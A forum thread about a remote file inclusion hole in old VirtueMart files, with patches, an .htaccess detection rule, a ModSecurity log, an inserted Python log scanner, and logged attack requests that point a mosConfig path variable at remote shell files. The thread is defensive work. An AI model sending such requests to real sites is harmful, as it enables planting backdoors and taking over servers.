Author Topic: Hacked by url injection file EXPORT.PHP  (Read 30628 times)

rezopac

  • Beginner
  • *
  • Posts: 14
Hacked by url injection file EXPORT.PHP
« on: January 05, 2010, 11:35:39 am »
Hello. If your server's owner gives you this type of log, this subject is for you:

194.146.227.28 - - [xx/Jan/20xx:08:31:18 +0100] "GET
//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.onesiteoranother.fr/media/Shaun$.txt?
HTTP/1.1" 200 167 "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"

Know that it is a way to upload files into your cache folder. This is only possible for VirtueMart versions < 1.1.3; in fact it has been repaired in the latest versions, but after being hacked I haven't found anything on the web about this.

The way to secure it is very simple: you just have to replace these lines in the file /administrator/components/com_virtuemart/export.php (near line 10):

else
   die( "Joomla Configuration File not found!" );


require_once( $mosConfig_absolute_path . '/includes/joomla.php' );

by:

else {
   die( "Joomla Configuration File not found!" );
}
if( isset($_REQUEST['mosConfig_absolute_path'])) die();

require_once( $mosConfig_absolute_path . '/includes/joomla.php' );

If you are completely obsessed with security you can also add these lines at line 0:

// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );

Goodbye, and now you can look for the uploaded backdoor (beware of c99sh.php).

Thank you for letting this post stay up, and don't hesitate to reply if you want more specific details.



Inazo

  • Beginner
  • *
  • Posts: 1
Re: Hacked by url injection file EXPORT.PHP
« Reply #1 on: January 07, 2010, 14:20:50 pm »
Hello all,

This RFI is not only in export.php; it can also be exploited in components/com_virtuemart/show_image_in_imgtag.php

To patch it, other solutions:

   1. register_globals OFF
   2. Add rules in ".htaccess" : "RewriteCond %{QUERY_STRING} mosConfig.[a-zA-Z.]{1,21}(=|\%3D) [OR]"

Quote
good bye, and now you can look for the uploaded backdoor (beware of c99sh.php).

A backdoor can have lots of names, be careful!!! We have seen "http.txt", "imags.php", "offflines.php" and lots of others.

Best regards,
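As an added example (not code from this thread), here is a small Python scanner for Apache access log lines that flags the request pattern quoted in the first post: it normalises parameter names the way PHP does (dots and spaces become underscores), so it catches both the mosConfig.absolute.path and the mosConfig_absolute_path spellings, whereas the RewriteCond pattern above only matches the dotted form because its character class contains no underscore. The sample log lines are constructed, apart from the request quoted in the first post.

```python
import re
from urllib.parse import parse_qsl

# Minimal parser for an Apache combined-format access log line; only the client IP
# and the request target are needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)
# A mosConfig_* value starting with one of these schemes is a remote include attempt.
REMOTE_SCHEME_RE = re.compile(r'^\s*(https?|ftps?)://', re.IGNORECASE)


def php_var_name(name: str) -> str:
    """Normalise a query parameter name the way PHP does when registering it: dots and
    spaces become underscores, so mosConfig.absolute.path and mosConfig_absolute_path
    end up in the same variable once register_globals is on."""
    return name.replace('.', '_').replace(' ', '_')


def rfi_indicators(line: str) -> list:
    """Return (param, value) pairs where a mosConfig_* variable is set to a remote URL.
    An empty list means the line carries no such indicator."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = m.group('target')
    query = target.split('?', 1)[1] if '?' in target else ''
    hits = []
    # parse_qsl percent-decodes, so %3D and %3A%2F%2F are handled as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if php_var_name(name).lower().startswith('mosconfig_') and REMOTE_SCHEME_RE.match(value):
            hits.append((name, value))
    return hits


def scan_log(lines) -> list:
    """Return (client_ip, param, value) for every flagged request in the given lines."""
    findings = []
    for line in lines:
        for param, value in rfi_indicators(line):
            findings.append((LOG_RE.match(line).group('ip'), param, value))
    return findings


# Constructed sample: line 1 is the request from the first post joined onto one line;
# lines 2 and 3 are made up (198.51.100.0/24 is a documentation address range).
SAMPLE_LOG = [
    '194.146.227.28 - - [xx/Jan/20xx:08:31:18 +0100] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.onesiteoranother.fr/media/Shaun$.txt? HTTP/1.1" 200 167 "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"',
    '198.51.100.7 - - [04/Aug/2010:04:25:10 +0100] "GET /index.php?option=com_virtuemart&page=shop.browse HTTP/1.1" 200 8123 "Mozilla/5.0"',
    '198.51.100.9 - - [04/Aug/2010:04:25:11 +0100] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http%3A%2F%2Fexample.invalid%2Fshell.txt%3F HTTP/1.1" 200 167 "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, param, value in scan_log(SAMPLE_LOG):
        print(f'{ip}: {param} -> {value}')
```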

rezopac

  • Beginner
  • *
  • Posts: 14
Re: Hacked by url injection file show_image_in_imgtag.PHP
« Reply #2 on: January 07, 2010, 15:35:46 pm »
Yes, you're totally right, but I've never found the way to use it.

That is not a reason to ignore it, so I thank you for your contribution.


As in export.php, it can be fixed by adding, on line 24, between:
include_once("../../administrator/components/com_virtuemart/virtuemart.cfg.php");

//   Image2Thumbnail - include class
include( CLASSPATH . "class.img2thumb.php");

this code :
if( isset($_REQUEST['mosConfig_absolute_path'])) die();

Now nobody can define another mosconfig_absolute_path variable without stopping script execution.

Good securing, and beware of base64-encoded files; it is probably a backdoor like mod_mosef.php.

Good afternoon.

rezopac

  • Beginner
  • *
  • Posts: 14
Hacked by url injection file show_image_in_imgtag.php and export.php
« Reply #3 on: January 14, 2010, 10:08:59 am »
Hello :

Now I post this new subject because there is a big problem.

Know that when you take away a hacker's access to his backdoor, he is going to spend all his time trying to F..K you.

That's what happens...

OK, so it appears that in the files show_image_in_imgtag.php and export.php, it is not effective to put only the code:

if( isset($_REQUEST['mosConfig_absolute_path'])) die();


You must add, just after this line:

if( isset($_REQUEST['mosConfig.absolute.path'])) die();

And you have to add at the beginning of the file :

// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );



IF THIS HASN'T BEEN ADDED YOU ARE STILL VULNERABLE TO ATTACKS:

I'm not gonna say how the hacker has done his job because it is not public right now.

I INSIST ON THE FACT THAT THOSE LINES MUST BE ADDED FOR ALL VERSIONS OF VIRTUEMART AND IN THE TWO FILES EXPORT.PHP AND SHOW_IMAGE_IN_IMGTAG.PHP

Those files are located at:
administrator/components/com_virtuemart/export.php
components/com_virtuemart/show_image_in_imgtag.php (you are in the public zone so your .htaccess cannot do anything for you)

Have a nice day

Ked

  • Beginner
  • *
  • Posts: 1
Re: Hacked by url injection file EXPORT.PHP
« Reply #4 on: August 04, 2010, 10:21:20 am »
Hi,

I just found this thread by searching on "com_virtuemart export.php" as one of the sites I host came under multiple simultaneous attacks early this morning.

I'd just like to say that a good extra line of defense is Apache mod_security combined with the modsec rules from GotRoot. It's a free application-level firewall which will block any remote file inclusion / PHP injection type attacks. Here's an example of it blocking the attacks this morning:

[Wed Aug 04 04:39:45 2010] [error] [client 202.125.152.246] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith http://%{SERVER_NAME}/" against "MATCHED_VAR" required. [file "/usr/local/apache/conf/modsec_rules/10_asl_rules.conf"] [line "203"] [id "340026"] [rev "49"] [msg "PHP Injection attempt in URI"] [data ""] [severity "CRITICAL"] [hostname "www.mysite.com"] [uri "/administrator/components/com_virtuemart/export.php"] [unique_id "TFjhAVXqhd4AABWTgC8AAAAF"]

Combined with IPTables (in my case CSF) the attacking IP is automatically banned permanently.

I got 5 of these attacks simultaneously at around 04:25 this morning, all originating from different IPs.

Is anyone noticing an upswing in these attacks atm?

Regards,

Ked



mwf

  • Jr. Member
  • **
  • Posts: 87
  • Ready to Code!
    • EXPS
Re: Hacked by url injection file EXPORT.PHP
« Reply #5 on: August 04, 2010, 12:16:38 pm »
Hi Ked,

I noticed increased spammer/hacker action this weekend - one site was hit with 200+ sequential bogus requests. Fortunately, there was no effect on the site. In addition to modifying show_image_in_imgtag.php as suggested here, I removed export.php and fetchscript.php from VM altogether. I never use the Export Module so I removed it completely. Fetchscript was attracting spammers/hackers because "define(_JEXEC)..." cannot be added to the file. The compression fetchscript provided has been replaced with minified code versions and the Joomla GZip option.

Another line of defense is the Joomla template error.php which I use to trap and direct attackers. It also sends me an alert when bad bots turn up or page errors are thrown (500, 404, 403...).


My final line of defense is country blocking via .htaccess using lists posted here http://www.countryipblocks.net/

Prior to making these changes, sites were being hit daily with spam/hack requests. After making these changes, very few "?mosconfig.." type attacks.

I'll checkout your suggestion - thanks!
Professional Joomla Development and Support
http://www.exps.ca

TimU

  • Beginner
  • *
  • Posts: 29
Re: Hacked by url injection file EXPORT.PHP
« Reply #6 on: August 10, 2010, 02:51:10 am »
Issue found with these instructions, VM version 1.1.5

When I included:
Code:
// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );

into the top of show_image_in_imgtag.php as suggested here, my site no longer showed thumbnail images in the category browse pages.

Just so I'm clear, can someone please confirm if the below config is correct?

In show_image_in_imgtag.php, ~line 28/29 it should now read:
Code:
if( isset($_REQUEST['mosConfig_absolute_path'])) die();
if( isset($_REQUEST['mosConfig.absolute.path'])) die();
www.Invitations2Impress.com
Personalised Invitations For Every Occasion

We custom design event invitations using your own photos to give an extra personal touch that your guests will love!
All our designs can be made to suit ANY occasion!

mwf

  • Jr. Member
  • **
  • Posts: 87
  • Ready to Code!
    • EXPS
Re: Hacked by url injection file EXPORT.PHP
« Reply #7 on: August 11, 2010, 12:09:20 pm »
TimU,

I'm using 1.1.5 and there is no problem with category thumbs displaying.
The changes I made to show_image_in_imgtag.php are a little different:

Add to top of file:
defined('_JEXEC') or die( 'Restricted access' );

Remove from file:
define('_VALID_MOS', 1);

// Get the Joomla! configuration file
$config_file = '../../configuration.php';
include_once( $config_file );

if( isset($_REQUEST['mosConfig_absolute_path'])) die();

if( !isset( $mosConfig_absolute_path ) ) {
// We are in J! 1.5
   define( '_JEXEC', 1 );
   $mosConfig_absolute_path = dirname( $config_file );
}

include_once("../../administrator/components/com_virtuemart/virtuemart
Professional Joomla Development and Support
http://www.exps.ca

magestyx

  • Beginner
  • *
  • Posts: 7
Re: Hacked by url injection file EXPORT.PHP
« Reply #8 on: May 12, 2011, 18:48:56 pm »
Regarding show_image_in_imgtag.php :

Like TimU, I can confirm that requiring _JEXEC to be defined does not allow thumbnails to show (J1.5.11 & VM1.1.3). And it makes sense why. The show_image_in_imgtag.php is somewhat of a standalone file that simply returns a resized image. It doesn't have to be called from another Joomla file in order to work. If you look at one of the image tags it creates in VM you can go to it directly and it'll show the image in a browser. As soon as you require _JEXEC it's going to die, since the Joomla framework is not needed or loaded for the script to run. Unless you define it manually, which defeats the purpose, it'll return 'Restricted Access'.

Regarding the above code, it also seems redundant to have the script define _JEXEC if there's no mosConfig_absolute_path. If there's a _REQUEST set for mosConfig_absolute_path then simply kill the script, that's it, so why all the extra code? You also don't have to include the Joomla config file if you're setting mosConfig_absolute_path to the same thing.

Clearing all that out, this works for me:

if( isset($_REQUEST['mosConfig_absolute_path'])) die(); //just kill it if this is found for any reason
define( '_JEXEC', 1 ); //since there's no Joomla framework being loaded, we need this so we can run the joomla configuration file
$mosConfig_absolute_path = dirname( '../../configuration.php' );
include_once("../../administrator/components/com_virtuemart/virtuemart.cfg.php");


Still, since I have disallowed mosConfig_* as a query request through the .htaccess file, I'm still not sure this is necessary at all. Frankly it all seems double and triple redundant, but do correct me if I'm wrong.

Magestyx